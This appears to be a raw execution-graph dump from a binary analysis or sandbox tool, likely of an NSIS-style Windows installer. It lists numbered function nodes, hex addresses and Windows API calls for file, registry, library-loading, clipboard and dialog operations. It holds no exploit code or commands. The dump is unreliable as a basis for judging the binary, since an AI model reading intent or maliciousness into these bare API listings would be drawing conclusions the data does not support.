                                                                                                                                                                                                                                                                                                          execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 